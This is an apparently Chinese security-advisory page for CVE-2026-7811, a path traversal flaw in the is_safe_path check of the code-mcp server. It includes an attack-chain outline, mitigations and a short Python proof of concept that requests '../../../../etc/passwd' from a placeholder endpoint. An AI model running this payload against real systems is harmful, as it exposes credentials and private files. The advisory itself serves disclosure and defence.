IPBUF安全漏洞报告
English
CVE-2026-7811 CVSS 7.3 高危

CVE-2026-7811 code-mcp路径遍历漏洞

披露日期: 2026-05-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7811
漏洞类型
路径遍历
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
54yyyu code-mcp

相关标签

路径遍历Path Traversalcode-mcpCVE-2026-7811文件读取

漏洞概述

54yyyu code-mcp 项目中的 src/code_mcp/server.py 文件存在路径遍历漏洞。该漏洞源于 is_safe_path 函数未能正确验证用户输入,导致攻击者可以通过特殊字符绕过路径限制。由于该组件采用滚动发布模式,受影响版本包括特定提交哈希及之前的版本。攻击者无需认证即可远程利用此漏洞读取系统敏感文件,对机密性、完整性和可用性造成威胁。

技术细节

该漏洞位于 54yyyu code-mcp 项目的 src/code_mcp/server.py 文件中,具体涉及 is_safe_path 函数的实现缺陷。该函数的主要职责是确保用户请求的文件路径被限制在特定的工作目录内,以防止目录遍历攻击。然而,由于代码逻辑未能正确处理路径规范化或未严格过滤路径分隔符,攻击者可以通过精心构造包含“../”或绝对路径的 Payload 绕过安全检查。例如,攻击者发送包含遍历序列的请求时,后端可能直接拼接路径而未进行严格的解析验证,导致最终访问的文件路径跳出了预定目录。由于该产品采用滚动发布,且官方尚未响应,相关版本均受影响。此漏洞无需认证即可远程利用,可能导致敏感信息泄露。

攻击链分析

STEP 1
侦察
攻击者识别互联网上暴露的 54yyyu code-mcp 服务实例。
STEP 2
构造载荷
攻击者构造包含 '../' 序列的恶意文件路径参数,旨在绕过目录限制。
STEP 3
发送请求
攻击者向目标服务器发送包含恶意路径的 HTTP 请求。
STEP 4
触发漏洞
服务端 is_safe_path 函数校验失效,允许读取指定目录之外的文件。
STEP 5
获取数据
攻击者成功读取服务器上的敏感文件(如配置文件、源代码等)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-7811 Path Traversal import requests target_url = "http://target-ip:port/api/read_file" # Payload exploiting path traversal payload = {"file_path": "../../../../etc/passwd"} try: response = requests.get(target_url, params=payload) if response.status_code == 200 and "root:" in response.text: print("[+] Vulnerability confirmed!") print(response.text) else: print("[-] Exploit failed or target patched.") except Exception as e: print(f"Error: {e}")

影响范围

54yyyu code-mcp <= commit 4cfc4643541a110c906d93635b391bf7e357f4a8

防御指南

临时缓解措施
建议暂时限制对受影响服务的网络访问,仅允许可信 IP 连接。开发者应立即审查 src/code_mcp/server.py 中的 is_safe_path 函数,确保在使用文件路径前使用标准库函数进行严格的边界检查,移除所有路径遍历字符,直到官方发布修复版本。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表